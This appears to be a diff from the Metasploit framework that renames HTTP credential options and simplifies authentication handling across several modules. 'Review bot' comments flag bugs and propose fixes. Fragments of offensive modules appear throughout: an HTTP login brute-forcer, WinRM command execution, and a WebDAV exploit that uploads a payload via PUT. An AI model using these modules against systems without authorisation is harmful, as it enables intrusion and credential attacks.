last of revert-merge snaffu
parent
6abbbeb3ca
commit
0ae489b37b
@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
))
|
))
|
||||||
|
|
||||||
# disabling all the unnecessary options that someone might set to break our query
|
# disabling all the unnecessary options that someone might set to break our query
|
||||||
deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN',
|
deregister_options('RPORT','RHOST', 'DOMAIN',
|
||||||
'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
|
'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
|
||||||
'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
|
'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
|
||||||
'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL')
|
'NTLM::UseNTLMv2','SSL')
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Name' => 'Cisco Device HTTP Device Manager Access',
|
'Name' => 'Cisco Device HTTP Device Manager Access',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module gathers data from a Cisco device (router or switch) with the device manager
|
This module gathers data from a Cisco device (router or switch) with the device manager
|
||||||
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
|
web interface exposed. The USERNAME and PASSWORD options can be used to specify
|
||||||
authentication.
|
authentication.
|
||||||
},
|
},
|
||||||
'Author' => [ 'hdm' ],
|
'Author' => [ 'hdm' ],
|
||||||
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
|
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
|
||||||
|
|
||||||
# Report a vulnerability only if no password was specified
|
# Report a vulnerability only if no password was specified
|
||||||
if datastore['BasicAuthPass'].to_s.length == 0
|
if datastore['PASSWORD'].to_s.length == 0
|
||||||
|
|
||||||
report_vuln(
|
report_vuln(
|
||||||
{
|
{
|
||||||
|
|
|
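Review bot: `datastore['PASSWORD'].to_s.length == 0` is the non-idiomatic way to spell an empty-string test on the new line; `if datastore['PASSWORD'].to_s.empty?` says the same thing and reads like the comment above it ("only if no password was specified"). The enclosing method starts above the hunk.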
@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
|
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
|
||||||
end
|
end
|
||||||
|
|
||||||
def find_auth_uri_and_scheme
|
def find_auth_uri
|
||||||
|
|
||||||
path_and_scheme = []
|
|
||||||
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
|
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
|
||||||
paths = [datastore['AUTH_URI']]
|
paths = [datastore['AUTH_URI']]
|
||||||
else
|
else
|
||||||
|
@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
next if not res
|
next if not res
|
||||||
end
|
end
|
||||||
|
|
||||||
next if not res.code == 401
|
return path
|
||||||
next if not res.headers['WWW-Authenticate']
|
|
||||||
path_and_scheme << path
|
|
||||||
case res.headers['WWW-Authenticate']
|
|
||||||
when /Basic/i
|
|
||||||
path_and_scheme << "Basic"
|
|
||||||
when /NTLM/i
|
|
||||||
path_and_scheme << "NTLM"
|
|
||||||
when /Digest/i
|
|
||||||
path_and_scheme << "Digest"
|
|
||||||
end
|
|
||||||
return path_and_scheme
|
|
||||||
end
|
end
|
||||||
|
|
||||||
return path_and_scheme
|
return path
|
||||||
end
|
end
|
||||||
|
|
||||||
def target_url
|
def target_url
|
||||||
|
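Review bot: The rewritten loop body returns the first path that produced any response at all, because the `res.code == 401` and `WWW-Authenticate` checks were removed along with the scheme detection, so `find_auth_uri` no longer finds a URI that asks for authentication; the caller's message "No URI found that asks for HTTP authentication" in the next hunk, and a brute force against a path that answers 200 without credentials (where `determine_result` would then report every guess as a success), no longer match its behaviour. Keeping the challenge test inline, `next unless res.code == 401`, just before `return path` preserves the old contract. The trailing `return path` after the loop also looks wrong: if `path` is the block parameter of the loop (its header lies between this hunk and the previous one and is not shown), the name is out of scope there and raises NameError whenever no path responded, so `return nil` is presumably what is intended. `find_auth_uri` begins in the previous hunk.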
@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_error("You need need to set AUTH_URI when using PUT Method !")
|
print_error("You need need to set AUTH_URI when using PUT Method !")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
@uri, @scheme = find_auth_uri_and_scheme()
|
@uri = find_auth_uri
|
||||||
if ! @uri
|
if ! @uri
|
||||||
print_error("#{target_url} No URI found that asks for HTTP authentication")
|
print_error("#{target_url} No URI found that asks for HTTP authentication")
|
||||||
return
|
return
|
||||||
|
@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
@uri = "/#{@uri}" if @uri[0,1] != "/"
|
@uri = "/#{@uri}" if @uri[0,1] != "/"
|
||||||
|
|
||||||
if ! @scheme
|
print_status("Attempting to login to #{target_url}")
|
||||||
print_error("#{target_url} Incompatible authentication scheme")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Attempting to login to #{target_url} with #{@scheme} authentication")
|
|
||||||
|
|
||||||
each_user_pass { |user, pass|
|
each_user_pass { |user, pass|
|
||||||
do_login(user, pass)
|
do_login(user, pass)
|
||||||
|
@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def do_login(user='admin', pass='admin')
|
def do_login(user='admin', pass='admin')
|
||||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||||
success = false
|
|
||||||
proof = ""
|
|
||||||
|
|
||||||
ret = do_http_login(user,pass,@scheme)
|
response = do_http_login(user,pass)
|
||||||
return :abort if ret == :abort
|
result = determine_result(response)
|
||||||
if ret == :success
|
|
||||||
proof = @proof.dup
|
|
||||||
success = true
|
|
||||||
end
|
|
||||||
|
|
||||||
if success
|
if result == :success
|
||||||
print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
|
print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
|
||||||
|
|
||||||
any_user = false
|
any_user = false
|
||||||
any_pass = false
|
any_pass = false
|
||||||
|
|
||||||
vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
|
vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
|
||||||
any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme)
|
any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
|
||||||
|
|
||||||
vprint_status("#{target_url} - Trying username:'#{user}' with random password")
|
vprint_status("#{target_url} - Trying username:'#{user}' with random password")
|
||||||
any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme)
|
any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
|
||||||
|
|
||||||
if any_user == :success
|
if any_user == :success
|
||||||
user = "anyuser"
|
user = "anyuser"
|
||||||
|
@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:sname => (ssl ? 'https' : 'http'),
|
:sname => (ssl ? 'https' : 'http'),
|
||||||
:user => user,
|
:user => user,
|
||||||
:pass => pass,
|
:pass => pass,
|
||||||
:proof => "WEBAPP=\"Generic\", PROOF=#{proof}",
|
:proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
|
||||||
:source_type => "user_supplied",
|
:source_type => "user_supplied",
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def do_http_login(user,pass,scheme)
|
def do_http_login(user,pass)
|
||||||
case scheme
|
|
||||||
when /NTLM/i
|
|
||||||
do_http_auth_ntlm(user,pass)
|
|
||||||
when /Digest/i
|
|
||||||
do_http_auth_digest(user,pass,datastore['REQUESTTYPE'])
|
|
||||||
when /Basic/i
|
|
||||||
do_http_auth_basic(user,pass)
|
|
||||||
else
|
|
||||||
vprint_error("#{target_url}: Unknown authentication scheme")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def do_http_auth_ntlm(user,pass)
|
|
||||||
begin
|
begin
|
||||||
resp,c = send_http_auth_ntlm(
|
response = send_request_cgi({
|
||||||
'uri' => @uri,
|
'uri' => @uri,
|
||||||
|
'method' => datastore['REQUESTTYPE'],
|
||||||
'username' => user,
|
'username' => user,
|
||||||
'password' => pass
|
'password' => pass
|
||||||
)
|
})
|
||||||
c.close
|
return response
|
||||||
return :abort if (resp.code == 404)
|
|
||||||
|
|
||||||
if [200, 301, 302].include?(resp.code)
|
|
||||||
@proof = resp
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError
|
rescue ::Rex::ConnectionError
|
||||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
vprint_error("#{target_url} - Failed to connect to the web server")
|
||||||
return :abort
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
return :fail
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def do_http_auth_basic(user,pass)
|
def determine_result(response)
|
||||||
user_pass = Rex::Text.encode_base64(user + ":" + pass)
|
return :abort unless response.kind_of? Rex::Proto::Http::Response
|
||||||
|
return :abort unless response.code
|
||||||
begin
|
return :success if [200, 301, 302].include?(response.code)
|
||||||
res = send_request_cgi({
|
|
||||||
'uri' => @uri,
|
|
||||||
'method' => 'GET',
|
|
||||||
'headers' =>
|
|
||||||
{
|
|
||||||
'Authorization' => "Basic #{user_pass}",
|
|
||||||
}
|
|
||||||
}, 25)
|
|
||||||
|
|
||||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
|
||||||
vprint_error("#{target_url} not responding")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :abort if (res.code == 404)
|
|
||||||
|
|
||||||
if [200, 301, 302].include?(res.code)
|
|
||||||
@proof = res
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError
|
|
||||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :fail
|
|
||||||
end
|
|
||||||
|
|
||||||
def do_http_auth_digest(user,pass,requesttype)
|
|
||||||
path = datastore['AUTH_URI'] || "/"
|
|
||||||
begin
|
|
||||||
if requesttype == "PUT"
|
|
||||||
res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => requesttype,
|
|
||||||
'data' => 'Test123\r\n',
|
|
||||||
#'DigestAuthIIS' => false,
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass
|
|
||||||
}, 25)
|
|
||||||
elsif requesttype == "PROPFIND"
|
|
||||||
res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => requesttype,
|
|
||||||
'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
|
|
||||||
#'DigestAuthIIS' => false,
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass,
|
|
||||||
'headers' => { 'Depth' => '0'}
|
|
||||||
}, 25)
|
|
||||||
else
|
|
||||||
res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => requesttype,
|
|
||||||
#'DigestAuthIIS' => false,
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass
|
|
||||||
}, 25)
|
|
||||||
end
|
|
||||||
|
|
||||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
|
||||||
vprint_error("#{target_url} not responding")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :abort if (res.code == 404)
|
|
||||||
|
|
||||||
if ( [200, 301, 302].include?(res.code) ) or (res.code == 201)
|
|
||||||
if ((res.code == 201) and (requesttype == "PUT"))
|
|
||||||
print_good("Trying to delete #{path}")
|
|
||||||
del_res,c = send_digest_request_cgi({
|
|
||||||
'uri' => path,
|
|
||||||
'method' => 'DELETE',
|
|
||||||
'DigestAuthUser' => user,
|
|
||||||
'DigestAuthPassword' => pass
|
|
||||||
}, 25)
|
|
||||||
if not (del_res.code == 204)
|
|
||||||
print_error("#{path} could be created, but not deleted again. This may have been noisy ...")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
@proof = res
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
if (res.code == 207) and (requesttype == "PROPFIND")
|
|
||||||
@proof = res
|
|
||||||
return :success
|
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionError
|
|
||||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
|
||||||
return :abort
|
|
||||||
end
|
|
||||||
|
|
||||||
return :fail
|
return :fail
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
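Review bot: `determine_result` maps every code other than 200/301/302 to `:fail`, so a 404 on `@uri`, which the old code treated as `:abort`, and the 201/207 that a successful PUT or PROPFIND returns are now indistinguishable from a wrong password, although `REQUESTTYPE` still selects those methods (the "set AUTH_URI when using PUT" check survives in an earlier hunk). The abort value is also never acted on any more: `do_login` computes `result = determine_result(response)` and only tests `== :success`, whereas the removed `return :abort if ret == :abort` let the credential loop stop after a connection failure, so a dead host is now retried once per user/password pair. Adding `return :abort if result == :abort` after the `determine_result` call in `do_login` and extending `determine_result` as below restores both; note also that the PUT path no longer sends a body nor deletes what it created, so a successful PUT may leave an empty resource behind (the old code issued a DELETE afterwards).
```ruby
def determine_result(response)
  return :abort unless response.kind_of? Rex::Proto::Http::Response
  return :abort unless response.code
  # 404 means the URI is gone for every credential; stop instead of reporting failures
  return :abort if response.code == 404
  return :success if [200, 301, 302].include?(response.code)
  # method-specific success codes the old digest path recognised
  return :success if response.code == 201 && datastore['REQUESTTYPE'] == "PUT"
  return :success if response.code == 207 && datastore['REQUESTTYPE'] == "PROPFIND"
  return :fail
end
```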
@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
|
vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
|
||||||
success = false
|
success = false
|
||||||
srvhdr = '?'
|
srvhdr = '?'
|
||||||
user_pass = Rex::Text.encode_base64(user + ":" + pass)
|
|
||||||
uri = normalize_uri(datastore['URI'])
|
uri = normalize_uri(datastore['URI'])
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'headers' =>
|
'username' => user,
|
||||||
{
|
'password' => pass
|
||||||
'Authorization' => "Basic #{user_pass}",
|
|
||||||
}
|
|
||||||
}, 25)
|
}, 25)
|
||||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||||
vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
|
vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
|
||||||
|
|
|
@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
streams = winrm_run_cmd(datastore['CMD'])
|
streams = winrm_run_cmd(datastore['CMD'])
|
||||||
return unless streams.class == Hash
|
return unless streams.class == Hash
|
||||||
print_error streams['stderr'] unless streams['stderr'] == ''
|
print_error streams['stderr'] unless streams['stderr'] == ''
|
||||||
|
|
|
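Review bot: With the `accepts_ntlm_auth` guard gone, `run_host` goes straight to `winrm_run_cmd` and the following `return unless streams.class == Hash` exits silently, so a host that refuses the authentication method or does not answer now produces no output at all, where the removed branch at least told the operator why. An `else` on that check, e.g. `print_error "#{ip}:#{rport}: WinRM request failed, no command output received"` before the `return`, keeps that feedback without the extra round trip. The other two `run_host` hunks below still test `resp.nil?` and report it, so this only affects this module.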
@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
each_user_pass do |user, pass|
|
each_user_pass do |user, pass|
|
||||||
resp,c = send_request_ntlm(test_request)
|
resp = send_winrm_request(test_request)
|
||||||
if resp.nil?
|
if resp.nil?
|
||||||
print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
|
print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
|
||||||
return
|
return
|
||||||
|
|
|
@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
unless accepts_ntlm_auth
|
resp = send_winrm_request(winrm_wql_msg(datastore['WQL']))
|
||||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
|
|
||||||
if resp.nil?
|
if resp.nil?
|
||||||
print_error "Got no reply from the server"
|
print_error "Got no reply from the server"
|
||||||
return
|
return
|
||||||
|
|
|
@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
|
'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword',
|
deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
|
||||||
'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
|
|
||||||
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
|
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
|
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
|
||||||
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
|
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if res.code == 401
|
if res.code == 401
|
||||||
print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
|
print_error("401 Authorization Required! Our Credentials not accepted!")
|
||||||
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
|
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
|
||||||
print_status("Command successfully executed (according to the server).")
|
print_status("Command successfully executed (according to the server).")
|
||||||
end
|
end
|
||||||
|
|
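Review bot: The new 401 message `Our Credentials not accepted!` no longer tells the operator which options to correct, and the capitalised "Credentials" mid-sentence reads like a leftover of the option name that was dropped. `print_error("401 Authorization Required! The USERNAME/PASSWORD credentials were not accepted")` names the options registered in the hunk above. The enclosing method starts and ends outside the hunk.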
|
@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
authmsg = res.headers['WWW-Authenticate']
|
authmsg = res.headers['WWW-Authenticate']
|
||||||
end
|
end
|
||||||
print_error("The remote server responded expecting authentication")
|
print_error("The remote server responded expecting authentication")
|
||||||
if datastore['BasicAuthUser'] and datastore['BasicAuthPass']
|
if authmsg
|
||||||
print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser'])
|
|
||||||
elsif authmsg
|
|
||||||
print_error("WWW-Authenticate: %s" % authmsg)
|
print_error("WWW-Authenticate: %s" % authmsg)
|
||||||
end
|
end
|
||||||
cleanup_instructions(rpath, name) # display cleanup info
|
cleanup_instructions(rpath, name) # display cleanup info
|
||||||
|
|
|
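Review bot: With the `BasicAuthUser` branch removed, a rejected credential is reported only as the raw `WWW-Authenticate` header; the operator no longer learns that the username they supplied was tried and refused. If this module still takes a USERNAME option (the hunk does not show its options), restoring that line as `print_error("Credentials for \"%s\" were rejected" % datastore['USERNAME']) if datastore['USERNAME']` ahead of the `if authmsg` block keeps the information. The enclosing method starts above the hunk.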
@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
||||||
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
||||||
|
|
||||||
|
|
|
@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
||||||
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
||||||
|
|
||||||
|
|
|
@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
res = query_serverinfo
|
res = query_serverinfo
|
||||||
disconnect
|
disconnect
|
||||||
return CheckCode::Unknown if res.nil?
|
return CheckCode::Unknown if res.nil?
|
||||||
|
@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:host => rhost,
|
:host => rhost,
|
||||||
:port => rport,
|
:port => rport,
|
||||||
:sname => (ssl ? "https" : "http"),
|
:sname => (ssl ? "https" : "http"),
|
||||||
:user => datastore['BasicAuthUser'],
|
:user => datastore['USERNAME'],
|
||||||
:pass => datastore['BasicAuthPass'],
|
:pass => datastore['PASSWORD'],
|
||||||
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
mytarget = target
|
mytarget = target
|
||||||
if (target.name =~ /Automatic/)
|
if (target.name =~ /Automatic/)
|
||||||
mytarget = auto_target
|
mytarget = auto_target
|
||||||
|
@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:host => rhost,
|
:host => rhost,
|
||||||
:port => rport,
|
:port => rport,
|
||||||
:sname => (ssl ? "https" : "http"),
|
:sname => (ssl ? "https" : "http"),
|
||||||
:user => datastore['BasicAuthUser'],
|
:user => datastore['USERNAME'],
|
||||||
:pass => datastore['BasicAuthPass'],
|
:pass => datastore['PASSWORD'],
|
||||||
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
|
|
@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def go(command)
|
def go(command)
|
||||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
|
||||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
|
||||||
|
|
||||||
xml = <<-EOS
|
xml = <<-EOS
|
||||||
<?xml version="1.0"?>
|
<?xml version="1.0"?>
|
||||||
<methodCall>
|
<methodCall>
|
||||||
|
|
|
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(8080),
|
Opt::RPORT(8080),
|
||||||
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
|
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
|
||||||
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']),
|
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[
|
[
|
||||||
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
|
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
|
||||||
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
|
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
|
||||||
OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']),
|
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
|
||||||
OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp'])
|
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
uri = build_path
|
uri = build_path
|
||||||
print_status "Uploading Payload to #{uri}"
|
print_status "Uploading Payload to #{uri}"
|
||||||
res,c = send_digest_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'PUT',
|
'method' => 'PUT',
|
||||||
'data' => payload.raw,
|
'data' => payload.raw,
|
||||||
'DigestAuthUser' => datastore['RUSER'],
|
'username' => datastore['USERNAME'],
|
||||||
'DigestAuthPassword' => datastore['RPASS']
|
'password' => datastore['PASSWORD']
|
||||||
}, 25)
|
}, 25)
|
||||||
unless (res and res.code == 201)
|
unless (res and res.code == 201)
|
||||||
print_error "Failed to upload file!"
|
print_error "Failed to upload file!"
|
||||||
|
|
|
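Review bot: USERNAME and PASSWORD become optional (`false`) in the first hunk while `exploit` passes them to `send_request_cgi` unconditionally, so a blank option sends a nil credential and the only feedback on a 401 is the generic "Failed to upload file!"; the replaced RUSER/RPASS options were required. Either keep the `true` flag, or make the failure branch say what came back, `print_error "Failed to upload file! (HTTP #{res ? res.code : 'no response'})"`, so an authentication rejection can be told apart from a missing WebDAV path. How the client behaves with a nil username is not visible here and should be confirmed.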
@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
@compat_mode = false
|
@compat_mode = false
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
|
||||||
unless accepts_ntlm_auth
|
|
||||||
print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth"
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
return Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
unless check == Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
return
|
|
||||||
end
|
|
||||||
unless valid_login?
|
unless valid_login?
|
||||||
print_error "Login Failure. Recheck your credentials"
|
print_error "Login Failure. Recheck your credentials"
|
||||||
return
|
return
|
||||||
|
@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def temp_dir
|
def temp_dir
|
